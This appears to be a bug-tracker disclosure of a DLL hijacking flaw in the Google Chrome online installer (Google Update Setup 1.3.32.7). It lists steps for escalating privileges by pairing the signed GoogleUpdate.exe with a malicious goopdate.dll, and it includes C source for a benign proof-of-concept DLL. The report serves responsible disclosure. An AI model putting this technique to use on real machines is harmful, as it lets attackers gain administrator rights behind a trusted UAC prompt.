VULNERABILITY DETAILS
The online installer drops a file GoogleUpdate.exe which tries to load goopdate.dll from its directory.
This behavior can be exploited by attacker for escalation of privileges with little tricky packaging of signed application GoogleUpdate.exe together with malicious DLL. See details below.

VERSION
Chrome Version: Google Update Setup 1.3.32.7, online installer of stable Google Chrome browser (filename after download: ChromeSetup.exe)
Operating System: Win 7 Enterprise, 32 bit, build 7601 Service Pack 1

REPRODUCTION CASE
Attached PoC exploit using valid GoogleUpdate.exe which is signed by Google Inc. (password for attached zip file is "infected")

1) User launches chrome_eopse.exe from attacker.
2) chrome_eopse.exe drops the valid GoogleSetup.exe and malicious goopdate.dll to %TEMP%
3) chrome_eopse.exe executes GoogleSetup.exe with run as administrator flag.
4) User will see UAC with GoogleSetup.exe and Google Inc as a verified publisher, so user probably will approve the elevated rights to valid GoogleSetup.exe
5) GoogleSetup.exe loads malicious goopdate.dll
6) malicious code from goopdate.dll is executed with administrator's rights

PoC sources of "malicious" dll:
--------------------
#include <windows.h>
#include <stdio.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
	FILE *hfile = fopen("C:\\pwned.txt", "w");
	fputs("PWNED\n",hfile);
	fclose(hfile);
	MessageBox(0,"You have been pwned, see C:\\pwned.txt !\n","Pwned",MB_ICONINFORMATION);
	return TRUE;
}
--------------------

NOTE
As a malware researcher I have already met malware sample which exploited similar flaw in another programs for privilege escalation.

 

Deleted: chrome_eopse.zip 66.6 KB

chrome_eopse.zip 66.6 KB Download